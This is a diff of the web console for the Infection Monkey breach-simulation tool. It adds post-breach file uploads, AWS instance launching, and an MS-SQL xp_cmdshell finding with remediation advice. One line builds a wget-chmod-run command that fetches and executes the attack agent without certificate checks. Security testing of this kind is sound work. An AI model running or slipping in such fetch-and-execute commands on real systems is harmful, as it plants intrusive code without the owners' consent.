+        }
+      }
+    };
     // set schema from server
     this.state = {
       schema: {},
@@ -19,12 +47,14 @@ class ConfigurePageComponent extends AuthComponent {
       lastAction: 'none',
       sections: [],
       selectedSection: 'basic',
-      allMonkeysAreDead: true
+      allMonkeysAreDead: true,
+      PBAwinFile: [],
+      PBAlinuxFile: []
     };
   }

   componentDidMount() {
-    this.authFetch('/api/configuration')
+    this.authFetch('/api/configuration/island')
       .then(res => res.json())
       .then(res => {
         let sections = [];
@@ -44,7 +74,7 @@ class ConfigurePageComponent extends AuthComponent {
   onSubmit = ({formData}) => {
     this.currentFormData = formData;
     this.updateConfigSection();
-    this.authFetch('/api/configuration',
+    this.authFetch('/api/configuration/island',
       {
         method: 'POST',
         headers: {'Content-Type': 'application/json'},
@@ -93,7 +123,8 @@ class ConfigurePageComponent extends AuthComponent {
   };

   resetConfig = () => {
-    this.authFetch('/api/configuration',
+    this.removePBAfiles();
+    this.authFetch('/api/configuration/island',
       {
         method: 'POST',
         headers: {'Content-Type': 'application/json'},
@@ -110,6 +141,21 @@ class ConfigurePageComponent extends AuthComponent {
       });
   };

+  removePBAfiles(){
+    // We need to clean files from the widget, local state and configuration (to sync with the back end)
+    if (this.PBAwindowsPond !== null){
+      this.PBAwindowsPond.removeFile();
+    }
+    if (this.PBAlinuxPond !== null){
+      this.PBAlinuxPond.removeFile();
+    }
+    let request_options = {method: 'DELETE',
+                           headers: {'Content-Type': 'text/plain'}};
+    this.authFetch('/api/fileUpload/PBAlinux', request_options);
+    this.authFetch('/api/fileUpload/PBAwindows', request_options);
+    this.setState({PBAlinuxFile: [], PBAwinFile: []});
+  }
+
   onReadFile = (event) => {
     try {
       this.setState({
@@ -141,19 +187,96 @@ class ConfigurePageComponent extends AuthComponent {
       .then(res => res.json())
       .then(res => {
         // This check is used to prevent unnecessary re-rendering
-        this.setState({
-          allMonkeysAreDead: (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done'])
-        });
+        let allMonkeysAreDead = (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done']);
+        if (allMonkeysAreDead !== this.state.allMonkeysAreDead) {
+          this.setState({
+            allMonkeysAreDead: allMonkeysAreDead
+          });
+        }
       });
   };

+  PBAwindows = () => {
+    return (<FilePond
+      server={{ url:'/api/fileUpload/PBAwindows',
+        process: {headers: {'Authorization': this.jwtHeader}},
+        revert: {headers: {'Authorization': this.jwtHeader}},
+        restore: {headers: {'Authorization': this.jwtHeader}},
+        load: {headers: {'Authorization': this.jwtHeader}},
+        fetch: {headers: {'Authorization': this.jwtHeader}}
+      }}
+      files={this.getWinPBAfile()}
+      onupdatefiles={fileItems => {
+        this.setState({
+          PBAwinFile: fileItems.map(fileItem => fileItem.file)
+        })
+      }}
+      ref={ref => this.PBAwindowsPond = ref}
+    />)
+  };
+
+  PBAlinux = () => {
+    return (<FilePond
+      server={{ url:'/api/fileUpload/PBAlinux',
+        process: {headers: {'Authorization': this.jwtHeader}},
+        revert: {headers: {'Authorization': this.jwtHeader}},
+        restore: {headers: {'Authorization': this.jwtHeader}},
+        load: {headers: {'Authorization': this.jwtHeader}},
+        fetch: {headers: {'Authorization': this.jwtHeader}}
+      }}
+      files={this.getLinuxPBAfile()}
+      onupdatefiles={fileItems => {
+        this.setState({
+          PBAlinuxFile: fileItems.map(fileItem => fileItem.file)
+        })
+      }}
+      ref={ref => this.PBAlinuxPond = ref}
+    />)
+  };
+
+  getWinPBAfile(){
+    if (this.state.PBAwinFile.length !== 0){
+      return ConfigurePageComponent.getMockPBAfile(this.state.PBAwinFile[0])
+    } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename){
+      return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_windows_filename)
+    }
+  }
+
+  getLinuxPBAfile(){
+    if (this.state.PBAlinuxFile.length !== 0){
+      return ConfigurePageComponent.getMockPBAfile(this.state.PBAlinuxFile[0])
+    } else if (this.state.configuration.monkey.behaviour.PBA_linux_filename) {
+      return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_linux_filename)
+    }
+  }
+
+  static getFullPBAfile(filename){
+    let pbaFile = [{
+      source: filename,
+      options: {
+        type: 'limbo'
+      }
+    }];
+    return pbaFile
+  }
+
+  static getMockPBAfile(mockFile){
+    let pbaFile = [{
+      source: mockFile.name,
+      options: {
+        type: 'limbo'
+      }
+    }];
+    pbaFile[0].options.file = mockFile;
+    return pbaFile
+  }
+
   render() {
     let displayedSchema = {};
     if (this.state.schema.hasOwnProperty('properties')) {
       displayedSchema = this.state.schema['properties'][this.state.selectedSection];
       displayedSchema['definitions'] = this.state.schema['definitions'];
     }

     return (
       <Col xs={12} lg={8}>
         <h1 className="page-title">Monkey Configuration</h1>
@@ -175,9 +298,11 @@ class ConfigurePageComponent extends AuthComponent {
             }
             { this.state.selectedSection ?
               <Form schema={displayedSchema}
+                    uiSchema={this.uiSchema}
                     formData={this.state.configuration[this.state.selectedSection]}
                     onSubmit={this.onSubmit}
-                    onChange={this.onChange}>
+                    onChange={this.onChange}
+                    noValidate={true}>
                 <div>
                   { this.state.allMonkeysAreDead ?
                     '' :
@@ -240,7 +365,6 @@ class ConfigurePageComponent extends AuthComponent {
               </div>
               : ''}
           </div>
-
         </Col>
     );
   }
@@ -34,9 +34,12 @@ class LoginPageComponent extends React.Component {
     this.state = {
       failed: false
     };
-    if (this.auth.loggedIn()) {
-      this.redirectToHome();
-    }
+    this.auth.loggedIn()
+      .then(res => {
+        if (res) {
+          this.redirectToHome();
+        }
+      });
   }
 
   render() {
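The login-page change above implies that `auth.loggedIn()` now resolves asynchronously instead of returning a boolean. A minimal sketch of an auth helper with that contract (the endpoint and storage key are illustrative, not taken from this commit):

    // Sketch only: a loggedIn() that resolves to true/false instead of returning a boolean.
    // '/api/auth/check' and 'id_token' are hypothetical names.
    class AuthService {
      loggedIn() {
        return fetch('/api/auth/check', {headers: this.authHeader()})
          .then(res => res.ok);
      }

      authHeader() {
        const token = localStorage.getItem('id_token');
        return token ? {'Authorization': 'Bearer ' + token} : {};
      }
    }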
@@ -2,6 +2,7 @@ import React from 'react';
 import {Button, Col} from 'react-bootstrap';
 import BreachedServers from 'components/report-components/BreachedServers';
 import ScannedServers from 'components/report-components/ScannedServers';
+import PostBreach from 'components/report-components/PostBreach';
 import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
 import {edgeGroupToColor, options} from 'components/map/MapOptions';
 import StolenPasswords from 'components/report-components/StolenPasswords';
@@ -29,7 +30,8 @@ class ReportPageComponent extends AuthComponent {
     STRUTS2: 8,
     WEBLOGIC: 9,
     HADOOP: 10,
-    PTH_CRIT_SERVICES_ACCESS: 11
+    PTH_CRIT_SERVICES_ACCESS: 11,
+    MSSQL: 12
   };
 
   Warning =
@@ -104,7 +106,7 @@ class ReportPageComponent extends AuthComponent {
       .then(res => res.json())
       .then(res => {
         res.edges.forEach(edge => {
-          edge.color = edgeGroupToColor(edge.group);
+          edge.color = {'color': edgeGroupToColor(edge.group)};
         });
         this.setState({graph: res});
         this.props.onStatusChange();
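The `edge.color` change above swaps a plain color string for a color object. Assuming the map is rendered with vis.js, whose edge `color` option accepts either form, the object form leaves room for per-state overrides such as `highlight` and `hover`:

    // Sketch only: equivalent vis.js edge color notations (values are illustrative).
    const edgeAsString = {from: 1, to: 2, color: '#2ca02c'};
    const edgeAsObject = {from: 1, to: 2, color: {color: '#2ca02c'}};  // may also carry highlight/hover colors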
@@ -341,6 +343,8 @@ class ReportPageComponent extends AuthComponent {
                 <li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
               {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
                 <li>Mimikatz found login credentials of a user who has admin access to a server defined as critical.</li>: null }
+              {this.state.report.overview.issues[this.Issue.MSSQL] ?
+                <li>MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.</li> : null }
             </ul>
           </div>
           :
@@ -412,7 +416,6 @@ class ReportPageComponent extends AuthComponent {
         <div>
           {this.generateIssues(this.state.report.recommendations.issues)}
         </div>
 
       </div>
     );
   }
@@ -458,6 +461,9 @@ class ReportPageComponent extends AuthComponent {
         <div style={{marginBottom: '20px'}}>
           <BreachedServers data={this.state.report.glance.exploited}/>
         </div>
+        <div style={{marginBottom: '20px'}}>
+          <PostBreach data={this.state.report.glance.scanned}/>
+        </div>
         <div style={{marginBottom: '20px'}}>
           <ScannedServers data={this.state.report.glance.scanned}/>
         </div>
@@ -867,7 +873,23 @@ class ReportPageComponent extends AuthComponent {
     );
   }
 
+  generateMSSQLIssue(issue) {
+    return(
+      <li>
+        Disable the xp_cmdshell option.
+        <CollapsibleWellComponent>
+          The machine <span className="label label-primary">{issue.machine}</span> (<span
+          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
+          className="label label-danger">MSSQL exploit attack</span>.
+          <br/>
+          The attack was made possible because the target machine used an outdated MSSQL server configuration allowing
+          the usage of the xp_cmdshell command. To learn more about how to disable this feature, read <a
+          href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017">
+          Microsoft's documentation. </a>
+        </CollapsibleWellComponent>
+      </li>
+    );
+  }
+
   generateIssue = (issue) => {
     let data;
@@ -935,6 +957,9 @@ class ReportPageComponent extends AuthComponent {
       case 'hadoop':
         data = this.generateHadoopIssue(issue);
         break;
+      case 'mssql':
+        data = this.generateMSSQLIssue(issue);
+        break;
     }
     return data;
   };
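For reference, the new `mssql` branch hands the issue straight to `generateMSSQLIssue`, which only reads the machine name and IP address. An issue entry for this case therefore needs at least the following shape (sample values invented):

    // Sketch only: minimal issue object consumed via the 'mssql' case above.
    const sampleMssqlIssue = {
      type: 'mssql',            // selects the new switch branch
      machine: 'db-server-01',  // hypothetical machine name
      ip_address: '10.0.0.12'   // hypothetical address
    };
    // Passed through generateIssue, this renders the xp_cmdshell recommendation shown above.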
@@ -1,9 +1,10 @@
 import React from 'react';
-import {Button, Col, Well, Nav, NavItem, Collapse} from 'react-bootstrap';
+import {Button, Col, Well, Nav, NavItem, Collapse, Form, FormControl, FormGroup} from 'react-bootstrap';
 import CopyToClipboard from 'react-copy-to-clipboard';
 import {Icon} from 'react-fa';
 import {Link} from 'react-router-dom';
 import AuthComponent from '../AuthComponent';
+import AwsRunTable from "../run-monkey/AwsRunTable";
 
 class RunMonkeyPageComponent extends AuthComponent {
 
@@ -13,10 +14,19 @@ class RunMonkeyPageComponent extends AuthComponent {
       ips: [],
       runningOnIslandState: 'not_running',
       runningOnClientState: 'not_running',
+      awsClicked: false,
       selectedIp: '0.0.0.0',
       selectedOs: 'windows-32',
-      showManual: false
-    };
+      showManual: false,
+      showAws: false,
+      isOnAws: false,
+      isAwsAuth: false,
+      awsUpdateClicked: false,
+      awsUpdateFailed: false,
+      awsKeyId: '',
+      awsSecretKey: '',
+      awsMachines: []
+    };
   }
 
   componentDidMount() {
@@ -37,6 +47,15 @@ class RunMonkeyPageComponent extends AuthComponent {
         }
       });
 
+    this.fetchAwsInfo();
+    this.fetchConfig()
+      .then(config => {
+        this.setState({
+          awsKeyId: config['cnc']['aws_config']['aws_access_key_id'],
+          awsSecretKey: config['cnc']['aws_config']['aws_secret_access_key']
+        });
+      });
+
     this.authFetch('/api/client-monkey')
       .then(res => res.json())
       .then(res => {
@@ -50,9 +69,20 @@ class RunMonkeyPageComponent extends AuthComponent {
     this.props.onStatusChange();
   }
 
+  fetchAwsInfo() {
+    return this.authFetch('/api/remote-monkey?action=list_aws')
+      .then(res => res.json())
+      .then(res =>{
+        let is_aws = res['is_aws'];
+        if (is_aws) {
+          this.setState({isOnAws: true, awsMachines: res['instances'], isAwsAuth: res['auth']});
+        }
+      });
+  }
+
   generateLinuxCmd(ip, is32Bit) {
     let bitText = is32Bit ? '32' : '64';
-    return `curl -O -k https://${ip}:5000/api/monkey/download/monkey-linux-${bitText}; chmod +x monkey-linux-${bitText}; ./monkey-linux-${bitText} m0nk3y -s ${ip}:5000`
+    return `wget --no-check-certificate https://${ip}:5000/api/monkey/download/monkey-linux-${bitText}; chmod +x monkey-linux-${bitText}; ./monkey-linux-${bitText} m0nk3y -s ${ip}:5000`
   }
 
   generateWindowsCmd(ip, is32Bit) {
@@ -134,6 +164,192 @@ class RunMonkeyPageComponent extends AuthComponent {
       });
   };
 
+  toggleAws = () => {
+    this.setState({
+      showAws: !this.state.showAws
+    });
+  };
+
+  runOnAws = () => {
+    this.setState({
+      awsClicked: true
+    });
+
+    let instances = this.awsTable.state.selection.map(x => this.instanceIdToInstance(x));
+
+    this.authFetch('/api/remote-monkey',
+      {
+        method: 'POST',
+        headers: {'Content-Type': 'application/json'},
+        body: JSON.stringify({type: 'aws', instances: instances, island_ip: this.state.selectedIp})
+      }).then(res => res.json())
+      .then(res => {
+        let result = res['result'];
+
+        // update existing state, not run-over
+        let prevRes = this.awsTable.state.result;
+        for (let key in result) {
+          if (result.hasOwnProperty(key)) {
+            prevRes[key] = result[key];
+          }
+        }
+        this.awsTable.setState({
+          result: prevRes,
+          selection: [],
+          selectAll: false
+        });
+
+        this.setState({
+          awsClicked: false
+        });
+      });
+  };
+
+  updateAwsKeyId = (evt) => {
+    this.setState({
+      awsKeyId: evt.target.value
+    });
+  };
+
+  updateAwsSecretKey = (evt) => {
+    this.setState({
+      awsSecretKey: evt.target.value
+    });
+  };
+
+  fetchConfig() {
+    return this.authFetch('/api/configuration/island')
+      .then(res => res.json())
+      .then(res => {
+        return res.configuration;
+      })
+  }
+
+  updateAwsKeys = () => {
+    this.setState({
+      awsUpdateClicked: true,
+      awsUpdateFailed: false
+    });
+    this.fetchConfig()
+      .then(config => {
+        let new_config = config;
+        new_config['cnc']['aws_config']['aws_access_key_id'] = this.state.awsKeyId;
+        new_config['cnc']['aws_config']['aws_secret_access_key'] = this.state.awsSecretKey;
+        return new_config;
+      })
+      .then(new_config => {
+        this.authFetch('/api/configuration/island',
+          {
+            method: 'POST',
+            headers: {'Content-Type': 'application/json'},
+            body: JSON.stringify(new_config)
+          })
+          .then(res => res.json())
+          .then(res => {
+            this.fetchAwsInfo()
+              .then(res => {
+                if (!this.state.isAwsAuth) {
+                  this.setState({
+                    awsUpdateClicked: false,
+                    awsUpdateFailed: true
+                  })
+                }
+              });
+          });
+      });
+  };
+
+  instanceIdToInstance = (instance_id) => {
+    let instance = this.state.awsMachines.find(
+      function (inst) {
+        return inst['instance_id'] === instance_id;
+      });
+    return {'instance_id': instance_id, 'os': instance['os']}
+
+  };
+
+  renderAuthAwsDiv() {
+    return (
+      <div style={{'marginBottom': '2em'}}>
+        {
+          this.state.ips.length > 1 ?
+            <Nav bsStyle="pills" justified activeKey={this.state.selectedIp} onSelect={this.setSelectedIp}
+                 style={{'marginBottom': '2em'}}>
+              {this.state.ips.map(ip => <NavItem key={ip} eventKey={ip}>{ip}</NavItem>)}
+            </Nav>
+            : <div style={{'marginBottom': '2em'}} />
+        }
+
+        <AwsRunTable
+          data={this.state.awsMachines}
+          ref={r => (this.awsTable = r)}
+        />
+        <div style={{'marginTop': '1em'}}>
+          <button
+            onClick={this.runOnAws}
+            className={'btn btn-default btn-md center-block'}
+            disabled={this.state.awsClicked}>
+            Run on selected machines
+            { this.state.awsClicked ? <Icon name="refresh" className="text-success" style={{'marginLeft': '5px'}}/> : null }
+          </button>
+        </div>
+      </div>
+    )
+  }
+
+  renderNotAuthAwsDiv() {
+    return (
+      <div style={{'marginBottom': '2em'}}>
+        <p style={{'fontSize': '1.2em'}}>
+          You haven't set your AWS account details or they're incorrect. Please enter them below to proceed.
+        </p>
+        <div style={{'marginTop': '1em'}}>
+          <div className="col-sm-12">
+            <div className="col-sm-6 col-sm-offset-3" style={{'fontSize': '1.2em'}}>
+              <div className="panel panel-default">
+                <div className="panel-body">
+                  <div className="input-group center-block text-center">
+                    <input type="text" className="form-control" placeholder="AWS Access Key ID"
+                           value={this.state.awsKeyId}
+                           onChange={evt => this.updateAwsKeyId(evt)}/>
+                    <input type="text" className="form-control" placeholder="AWS Secret Access Key"
+                           value={this.state.awsSecretKey}
+                           onChange={evt => this.updateAwsSecretKey(evt)}/>
+                    <Button
+                      onClick={this.updateAwsKeys}
+                      className={'btn btn-default btn-md center-block'}
+                      disabled={this.state.awsUpdateClicked}
+                      variant="primary">
+                      Update AWS details
+                      { this.state.awsUpdateClicked ? <Icon name="refresh" className="text-success" style={{'marginLeft': '5px'}}/> : null }
+                    </Button>
+                  </div>
+                </div>
+              </div>
+            </div>
+          </div>
+          <div className="col-sm-8 col-sm-offset-2" style={{'fontSize': '1.2em'}}>
+            <p className="alert alert-info">
+              <i className="glyphicon glyphicon-info-sign" style={{'marginRight': '5px'}}/>
+              In order to remotely run commands on AWS EC2 instances, please make sure you have
+              the <a href="https://docs.aws.amazon.com/console/ec2/run-command/prereqs" target="_blank">prerequisites</a> and if the
+              instances don't show up, check the
+              AWS <a href="https://docs.aws.amazon.com/console/ec2/run-command/troubleshooting" target="_blank">troubleshooting guide</a>.
+            </p>
+          </div>
+          {
+            this.state.awsUpdateFailed ?
+              <div className="col-sm-8 col-sm-offset-2" style={{'fontSize': '1.2em'}}>
+                <p className="alert alert-danger" role="alert">Authentication failed.</p>
+              </div>
+              :
+              null
+          }
+        </div>
+      </div>
+    )
+  }
+
   render() {
     return (
       <Col xs={12} lg={8}>
@@ -166,7 +382,7 @@ class RunMonkeyPageComponent extends AuthComponent {
         <p className="text-center">
           OR
         </p>
-        <p style={{'marginBottom': '2em'}}>
+        <p style={this.state.showManual || !this.state.isOnAws ? {'marginBottom': '2em'} : {}}>
           <button onClick={this.toggleManual} className={'btn btn-default btn-lg center-block' + (this.state.showManual ? ' active' : '')}>
             Run on machine of your choice
           </button>
@@ -196,6 +412,30 @@ class RunMonkeyPageComponent extends AuthComponent {
             {this.generateCmdDiv()}
           </div>
         </Collapse>
+        {
+          this.state.isOnAws ?
+            <p className="text-center">
+              OR
+            </p>
+            :
+            null
+        }
+        {
+          this.state.isOnAws ?
+            <p style={{'marginBottom': '2em'}}>
+              <button onClick={this.toggleAws} className={'btn btn-default btn-lg center-block' + (this.state.showAws ? ' active' : '')}>
+                Run on AWS machine of your choice
+              </button>
+            </p>
+            :
+            null
+        }
+        <Collapse in={this.state.showAws}>
+          {
+            this.state.isAwsAuth ? this.renderAuthAwsDiv() : this.renderNotAuthAwsDiv()
+          }
+
+        </Collapse>
+
         <p style={{'fontSize': '1.2em'}}>
           Go ahead and monitor the ongoing infection in the <Link to="/infection/map">Infection Map</Link> view.
@@ -5,12 +5,17 @@ let renderArray = function(val) {
   return <div>{val.map(x => <div>{x}</div>)}</div>;
 };
 
+let renderIpAddresses = function (val) {
+  return <div>{renderArray(val.ip_addresses)} {(val.domain_name ? " (".concat(val.domain_name, ")") : "")} </div>;
+};
+
 const columns = [
   {
     Header: 'Breached Servers',
     columns: [
       {Header: 'Machine', accessor: 'label'},
-      {Header: 'IP Addresses', id: 'ip_addresses', accessor: x => renderArray(x.ip_addresses)},
+      {Header: 'IP Addresses', id: 'ip_addresses',
+        accessor: x => renderIpAddresses(x)},
       {Header: 'Exploits', id: 'exploits', accessor: x => renderArray(x.exploits)}
     ]
   }
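The new `renderIpAddresses` helper appends the machine's domain name, when present, after its IP list. A quick illustration with invented row data:

    // Sketch only: sample rows for the 'IP Addresses' column (values are made up).
    const row = {ip_addresses: ['10.0.0.7', '192.168.1.7'], domain_name: 'corp.example'};
    renderIpAddresses(row);               // two addresses followed by " (corp.example)"
    const rowWithoutDomain = {ip_addresses: ['10.0.0.8'], domain_name: ''};
    renderIpAddresses(rowWithoutDomain);  // just the address, no parenthesised suffix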
Some files were not shown because too many files have changed in this diff.